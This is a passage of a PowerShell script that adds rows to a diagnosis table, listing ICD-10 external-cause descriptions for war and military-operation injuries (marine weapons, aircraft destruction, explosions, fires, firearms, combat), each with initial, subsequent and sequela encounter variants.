operations occurring after cessation of hostilities, civilian","Unspecified war operations occurring after cessation of hostilities, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified war operations occurring after cessation of hostilities, civilian","Unspecified war operations occurring after cessation of hostilities, civilian, sequela") + $null = $DiagnosisList.Rows.Add("War operations, unspecified","War operations, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations, unspecified","War operations, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations, unspecified","War operations, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified weapon of mass destruction [WMD]","War operations involving unspecified weapon of mass destruction [WMD], initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified weapon of mass destruction [WMD]","War operations involving unspecified weapon of mass destruction [WMD], subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving unspecified weapon of mass destruction [WMD]","War operations involving unspecified weapon of mass destruction [WMD], sequela") + $null = $DiagnosisList.Rows.Add("War operations involving friendly fire","War operations involving friendly fire, initial encounter") + $null = $DiagnosisList.Rows.Add("War operations involving friendly fire","War operations involving friendly fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("War operations involving friendly fire","War operations involving friendly fire, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of unspecified marine weapon, military personnel","Military operations involving explosion of unspecified marine weapon, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of unspecified marine weapon, military personnel","Military operations involving explosion of unspecified marine weapon, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of unspecified marine weapon, military personnel","Military operations involving explosion of unspecified marine weapon, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of unspecified marine weapon, civilian","Military operations involving explosion of unspecified marine weapon, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of unspecified marine weapon, civilian","Military operations involving explosion of unspecified marine weapon, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of unspecified marine weapon, civilian","Military operations involving explosion of unspecified marine weapon, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of depth-charge, military personnel","Military operations involving explosion of depth-charge, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of depth-charge, military personnel","Military operations involving explosion of depth-charge, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of depth-charge, military personnel","Military operations involving explosion of depth-charge, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of depth-charge, civilian","Military operations involving explosion of depth-charge, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of depth-charge, civilian","Military operations involving explosion of depth-charge, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of depth-charge, civilian","Military operations involving explosion of depth-charge, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of marine mine, military personnel","Military operations involving explosion of marine mine, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of marine mine, military personnel","Military operations involving explosion of marine mine, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of marine mine, military personnel","Military operations involving explosion of marine mine, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of marine mine, civilian","Military operations involving explosion of marine mine, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of marine mine, civilian","Military operations involving explosion of marine mine, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of marine mine, civilian","Military operations involving explosion of marine mine, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of sea-based artillery shell, military personnel","Military operations involving explosion of sea-based artillery shell, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of sea-based artillery shell, military personnel","Military operations involving explosion of sea-based artillery shell, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of sea-based artillery shell, military personnel","Military operations involving explosion of sea-based artillery shell, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of sea-based artillery shell, civilian","Military operations involving explosion of sea-based artillery shell, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of sea-based artillery shell, civilian","Military operations involving explosion of sea-based artillery shell, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of sea-based artillery shell, civilian","Military operations involving explosion of sea-based artillery shell, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of torpedo, military personnel","Military operations involving explosion of torpedo, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of torpedo, military personnel","Military operations involving explosion of torpedo, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of torpedo, military personnel","Military operations involving explosion of torpedo, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of torpedo, civilian","Military operations involving explosion of torpedo, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of torpedo, civilian","Military operations involving explosion of torpedo, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of torpedo, civilian","Military operations involving explosion of torpedo, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving accidental detonation of onboard marine weapons, military personnel","Military operations involving accidental detonation of onboard marine weapons, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving accidental detonation of onboard marine weapons, military personnel","Military operations involving accidental detonation of onboard marine weapons, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving accidental detonation of onboard marine weapons, military personnel","Military operations involving accidental detonation of onboard marine weapons, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving accidental detonation of onboard marine weapons, civilian","Military operations involving accidental detonation of onboard marine weapons, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving accidental detonation of onboard marine weapons, civilian","Military operations involving accidental detonation of onboard marine weapons, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving accidental detonation of onboard marine weapons, civilian","Military operations involving accidental detonation of onboard marine weapons, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of other marine weapons, military personnel","Military operations involving explosion of other marine weapons, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of other marine weapons, military personnel","Military operations involving explosion of other marine weapons, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of other marine weapons, military personnel","Military operations involving explosion of other marine weapons, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of other marine weapons, civilian","Military operations involving explosion of other marine weapons, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of other marine weapons, civilian","Military operations involving explosion of other marine weapons, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of other marine weapons, civilian","Military operations involving explosion of other marine weapons, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified destruction of aircraft, military personnel","Military operations involving unspecified destruction of aircraft, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified destruction of aircraft, military personnel","Military operations involving unspecified destruction of aircraft, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified destruction of aircraft, military personnel","Military operations involving unspecified destruction of aircraft, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified destruction of aircraft, civilian","Military operations involving unspecified destruction of aircraft, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified destruction of aircraft, civilian","Military operations involving unspecified destruction of aircraft, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified destruction of aircraft, civilian","Military operations involving unspecified destruction of aircraft, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to enemy fire or explosives, military personnel","Military operations involving destruction of aircraft due to enemy fire or explosives, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to enemy fire or explosives, military personnel","Military operations involving destruction of aircraft due to enemy fire or explosives, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to enemy fire or explosives, military personnel","Military operations involving destruction of aircraft due to enemy fire or explosives, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to enemy fire or explosives, civilian","Military operations involving destruction of aircraft due to enemy fire or explosives, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to enemy fire or explosives, civilian","Military operations involving destruction of aircraft due to enemy fire or explosives, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to enemy fire or explosives, civilian","Military operations involving destruction of aircraft due to enemy fire or explosives, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to collision with other aircraft, military personnel","Military operations involving destruction of aircraft due to collision with other aircraft, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to collision with other aircraft, military personnel","Military operations involving destruction of aircraft due to collision with other aircraft, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to collision with other aircraft, military personnel","Military operations involving destruction of aircraft due to collision with other aircraft, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to collision with other aircraft, civilian","Military operations involving destruction of aircraft due to collision with other aircraft, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to collision with other aircraft, civilian","Military operations involving destruction of aircraft due to collision with other aircraft, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to collision with other aircraft, civilian","Military operations involving destruction of aircraft due to collision with other aircraft, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to onboard fire, military personnel","Military operations involving destruction of aircraft due to onboard fire, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to onboard fire, military personnel","Military operations involving destruction of aircraft due to onboard fire, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to onboard fire, military personnel","Military operations involving destruction of aircraft due to onboard fire, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to onboard fire, civilian","Military operations involving destruction of aircraft due to onboard fire, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to onboard fire, civilian","Military operations involving destruction of aircraft due to onboard fire, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to onboard fire, civilian","Military operations involving destruction of aircraft due to onboard fire, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, military personnel","Military operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, military personnel","Military operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, military personnel","Military operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, civilian","Military operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, civilian","Military operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, civilian","Military operations involving destruction of aircraft due to accidental detonation of onboard munitions and explosives, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving other destruction of aircraft, military personnel","Military operations involving other destruction of aircraft, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other destruction of aircraft, military personnel","Military operations involving other destruction of aircraft, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other destruction of aircraft, military personnel","Military operations involving other destruction of aircraft, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving other destruction of aircraft, civilian","Military operations involving other destruction of aircraft, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other destruction of aircraft, civilian","Military operations involving other destruction of aircraft, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other destruction of aircraft, civilian","Military operations involving other destruction of aircraft, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified explosion and fragments, military personnel","Military operations involving unspecified explosion and fragments, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified explosion and fragments, military personnel","Military operations involving unspecified explosion and fragments, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified explosion and fragments, military personnel","Military operations involving unspecified explosion and fragments, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified explosion and fragments, civilian","Military operations involving unspecified explosion and fragments, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified explosion and fragments, civilian","Military operations involving unspecified explosion and fragments, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified explosion and fragments, civilian","Military operations involving unspecified explosion and fragments, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of aerial bomb, military personnel","Military operations involving explosion of aerial bomb, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of aerial bomb, military personnel","Military operations involving explosion of aerial bomb, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of aerial bomb, military personnel","Military operations involving explosion of aerial bomb, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of aerial bomb, civilian","Military operations involving explosion of aerial bomb, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of aerial bomb, civilian","Military operations involving explosion of aerial bomb, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of aerial bomb, civilian","Military operations involving explosion of aerial bomb, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of guided missile, military personnel","Military operations involving explosion of guided missile, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of guided missile, military personnel","Military operations involving explosion of guided missile, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of guided missile, military personnel","Military operations involving explosion of guided missile, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of guided missile, civilian","Military operations involving explosion of guided missile, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of guided missile, civilian","Military operations involving explosion of guided missile, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of guided missile, civilian","Military operations involving explosion of guided missile, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of improvised explosive device [IED], military personnel","Military operations involving explosion of improvised explosive device [IED], military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of improvised explosive device [IED], military personnel","Military operations involving explosion of improvised explosive device [IED], military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of improvised explosive device [IED], military personnel","Military operations involving explosion of improvised explosive device [IED], military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of improvised explosive device [IED], civilian","Military operations involving explosion of improvised explosive device [IED], civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of improvised explosive device [IED], civilian","Military operations involving explosion of improvised explosive device [IED], civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion of improvised explosive device [IED], civilian","Military operations involving explosion of improvised explosive device [IED], civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, military personnel","Military operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, military personnel","Military operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, military personnel","Military operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, civilian","Military operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, civilian","Military operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, civilian","Military operations involving explosion due to accidental detonation and discharge of own munitions or munitions launch device, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments from munitions, military personnel","Military operations involving fragments from munitions, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments from munitions, military personnel","Military operations involving fragments from munitions, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments from munitions, military personnel","Military operations involving fragments from munitions, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments from munitions, civilian","Military operations involving fragments from munitions, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments from munitions, civilian","Military operations involving fragments from munitions, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments from munitions, civilian","Military operations involving fragments from munitions, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments of improvised explosive device [IED], military personnel","Military operations involving fragments of improvised explosive device [IED], military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments of improvised explosive device [IED], military personnel","Military operations involving fragments of improvised explosive device [IED], military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments of improvised explosive device [IED], military personnel","Military operations involving fragments of improvised explosive device [IED], military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments of improvised explosive device [IED], civilian","Military operations involving fragments of improvised explosive device [IED], civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments of improvised explosive device [IED], civilian","Military operations involving fragments of improvised explosive device [IED], civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments of improvised explosive device [IED], civilian","Military operations involving fragments of improvised explosive device [IED], civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments from weapons, military personnel","Military operations involving fragments from weapons, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments from weapons, military personnel","Military operations involving fragments from weapons, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments from weapons, military personnel","Military operations involving fragments from weapons, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments from weapons, civilian","Military operations involving fragments from weapons, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments from weapons, civilian","Military operations involving fragments from weapons, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving fragments from weapons, civilian","Military operations involving fragments from weapons, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving other explosions and fragments, military personnel","Military operations involving other explosions and fragments, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other explosions and fragments, military personnel","Military operations involving other explosions and fragments, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other explosions and fragments, military personnel","Military operations involving other explosions and fragments, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving other explosions and fragments, civilian","Military operations involving other explosions and fragments, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other explosions and fragments, civilian","Military operations involving other explosions and fragments, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other explosions and fragments, civilian","Military operations involving other explosions and fragments, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified fire, conflagration and hot substance, military personnel","Military operations involving unspecified fire, conflagration and hot substance, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified fire, conflagration and hot substance, military personnel","Military operations involving unspecified fire, conflagration and hot substance, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified fire, conflagration and hot substance, military personnel","Military operations involving unspecified fire, conflagration and hot substance, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified fire, conflagration and hot substance, civilian","Military operations involving unspecified fire, conflagration and hot substance, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified fire, conflagration and hot substance, civilian","Military operations involving unspecified fire, conflagration and hot substance, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unspecified fire, conflagration and hot substance, civilian","Military operations involving unspecified fire, conflagration and hot substance, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving gasoline bomb, military personnel","Military operations involving gasoline bomb, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving gasoline bomb, military personnel","Military operations involving gasoline bomb, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving gasoline bomb, military personnel","Military operations involving gasoline bomb, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving gasoline bomb, civilian","Military operations involving gasoline bomb, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving gasoline bomb, civilian","Military operations involving gasoline bomb, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving gasoline bomb, civilian","Military operations involving gasoline bomb, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving incendiary bullet, military personnel","Military operations involving incendiary bullet, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving incendiary bullet, military personnel","Military operations involving incendiary bullet, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving incendiary bullet, military personnel","Military operations involving incendiary bullet, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving incendiary bullet, civilian","Military operations involving incendiary bullet, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving incendiary bullet, civilian","Military operations involving incendiary bullet, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving incendiary bullet, civilian","Military operations involving incendiary bullet, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving flamethrower, military personnel","Military operations involving flamethrower, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving flamethrower, military personnel","Military operations involving flamethrower, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving flamethrower, military personnel","Military operations involving flamethrower, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving flamethrower, civilian","Military operations involving flamethrower, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving flamethrower, civilian","Military operations involving flamethrower, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving flamethrower, civilian","Military operations involving flamethrower, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving other fires, conflagrations and hot substances, military personnel","Military operations involving other fires, conflagrations and hot substances, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other fires, conflagrations and hot substances, military personnel","Military operations involving other fires, conflagrations and hot substances, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other fires, conflagrations and hot substances, military personnel","Military operations involving other fires, conflagrations and hot substances, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving other fires, conflagrations and hot substances, civilian","Military operations involving other fires, conflagrations and hot substances, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other fires, conflagrations and hot substances, civilian","Military operations involving other fires, conflagrations and hot substances, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other fires, conflagrations and hot substances, civilian","Military operations involving other fires, conflagrations and hot substances, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving rubber bullets, military personnel","Military operations involving rubber bullets, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving rubber bullets, military personnel","Military operations involving rubber bullets, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving rubber bullets, military personnel","Military operations involving rubber bullets, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving rubber bullets, civilian","Military operations involving rubber bullets, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving rubber bullets, civilian","Military operations involving rubber bullets, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving rubber bullets, civilian","Military operations involving rubber bullets, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving firearms pellets, military personnel","Military operations involving firearms pellets, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving firearms pellets, military personnel","Military operations involving firearms pellets, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving firearms pellets, military personnel","Military operations involving firearms pellets, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving firearms pellets, civilian","Military operations involving firearms pellets, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving firearms pellets, civilian","Military operations involving firearms pellets, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving firearms pellets, civilian","Military operations involving firearms pellets, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving other firearms discharge, military personnel","Military operations involving other firearms discharge, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other firearms discharge, military personnel","Military operations involving other firearms discharge, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other firearms discharge, military personnel","Military operations involving other firearms discharge, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving other firearms discharge, civilian","Military operations involving other firearms discharge, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other firearms discharge, civilian","Military operations involving other firearms discharge, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving other firearms discharge, civilian","Military operations involving other firearms discharge, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving unarmed hand to hand combat, military personnel","Military operations involving unarmed hand to hand combat, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unarmed hand to hand combat, military personnel","Military operations involving unarmed hand to hand combat, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unarmed hand to hand combat, military personnel","Military operations involving unarmed hand to hand combat, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving unarmed hand to hand combat, civilian","Military operations involving unarmed hand to hand combat, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unarmed hand to hand combat, civilian","Military operations involving unarmed hand to hand combat, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving unarmed hand to hand combat, civilian","Military operations involving unarmed hand to hand combat, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving combat using blunt or piercing object, military personnel","Military operations involving combat using blunt or piercing object, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving combat using blunt or piercing object, military personnel","Military operations involving combat using blunt or piercing object, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving combat using blunt or piercing object, military personnel","Military operations involving combat using blunt or piercing object, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving combat using blunt or piercing object, civilian","Military operations involving combat using blunt or piercing object, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving combat using blunt or piercing object, civilian","Military operations involving combat using blunt or piercing object, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving combat using blunt or piercing object, civilian","Military operations involving combat using blunt or piercing object, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving intentional restriction of air and airway, military personnel","Military operations involving intentional restriction of air and airway, military personnel, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving intentional restriction of air and airway, military personnel","Military operations involving intentional restriction of air and airway, military personnel, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving intentional restriction of air and airway, military personnel","Military operations involving intentional restriction of air and airway, military personnel, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving intentional restriction of air and airway, civilian","Military operations involving intentional restriction of air and airway, civilian, initial encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving intentional restriction of air and airway, civilian","Military operations involving intentional restriction of air and airway, civilian, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Military operations involving intentional restriction of air and airway, civilian","Military operations involving intentional restriction of air and airway, civilian, sequela") + $null = $DiagnosisList.Rows.Add("Military operations involving unintentional restriction of air and airway, military personnel","Military operations involving unintentional restriction of air and airway, military personnel, initial encounter") + $null = 